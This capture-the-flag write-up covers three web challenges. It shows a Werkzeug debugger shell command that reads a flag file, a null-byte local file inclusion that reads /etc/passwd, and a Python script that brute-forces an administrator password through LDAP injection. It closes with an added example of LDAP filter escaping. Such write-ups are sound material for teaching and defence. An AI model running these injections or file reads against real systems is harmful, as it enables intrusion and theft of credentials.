Web

Ladybug

Request /film/aaa to trigger an error and get to the Werkzeug debugger prompt, then run:

import os
os.popen("cat flag.txt").read()

Flag: flag{weurkzerg_the_worst_kind_of_debug}

Bite

So, let's go to one of the pages, Bit for example.

We'll see the URL http://jh2i.com:50010/?page=bit

?page= implies some form of LFI may be possible, as it looks like the specified page is imported into the template. So, let's go ahead and try http://jh2i.com:50010/?page=/etc/passwd

We'll find it gives an error about /etc/passwd.php not existing. This tells us it appends .php to the end of the page parameter and includes it.

Tony told me that a null byte causes the .php to become redundant as the null byte will terminate the string.

http://jh2i.com:50010/?page=/etc/passwd%00 works, displaying /etc/passwd.

So I took a guess and tried /flag.txt%00 and that gave the flag.

Flag: flag{lfi_just_needed_a_null_byte}

Lightweight Contact Book

With some fuzzing we can figure out that the search is using LDAP. The forgot password message reveals that the password is in the 'description' field. This allows us to brute-force the password character by character with a search of the form: administrator)(description=*

The search will return a result if the password matches this pattern.

The pw is: very_secure_hacktivity_pass

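import requests
import string
import sys

# Candidate characters for each password position
pwchars = string.ascii_lowercase + string.ascii_uppercase + "_- "

template = "http://jh2i.com:50019/?search=administrator)(description="
password = ""

while True:
    for c in pwchars:
        # The trailing * turns the guess into a prefix match on description
        r = requests.get(template + password + c + "*")
        if "Administrator User" in r.text:
            password += c
            break
        # Show the current guess, then move the cursor back up one line
        print(password + c)
        sys.stdout.write("\033[F")
    else:
        # No candidate extended the prefix, so the password is complete
        break

print(password)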

Flag: flag{kids_please_sanitize_your_inputs}
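
The fix the flag asks for, as an added example that is not part of the original write-up or the challenge's code: the search string from above is placed into an LDAP filter with and without RFC 4515 escaping. The filter template and the objectClass/cn attribute names are assumptions, since the page does not show the server side.

```python
import re

# RFC 4515 escapes for characters that are special in a filter value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

# Assumed server-side template (hypothetical; not shown on the page).
FILTER_TEMPLATE = "(&(objectClass=person)(cn={}))"


def escape_filter_value(value):
    """Escape one user-supplied assertion value for use inside a filter."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(search):
    """Vulnerable form: the search string is pasted into the filter as-is."""
    return FILTER_TEMPLATE.format(search)


def build_filter_safe(search):
    """Hardened form: the search string can only ever be a literal cn value."""
    return FILTER_TEMPLATE.format(escape_filter_value(search))


def asserted_attributes(ldap_filter):
    """List the attributes a filter tests, to show what the directory is asked."""
    return re.findall(r"\(([A-Za-z][A-Za-z0-9-]*)[~<>]?=", ldap_filter)


if __name__ == "__main__":
    search = "administrator)(description=*"  # search string from the write-up
    for build in (build_filter_unsafe, build_filter_safe):
        f = build(search)
        print(build.__name__, f, asserted_attributes(f))
```

With escaping, the description attribute is never queried, so the search result says nothing about its contents. Real code would normally call the LDAP library's own helper, for example ldap.filter.escape_filter_chars in python-ldap, and would not keep a password in a searchable attribute at all.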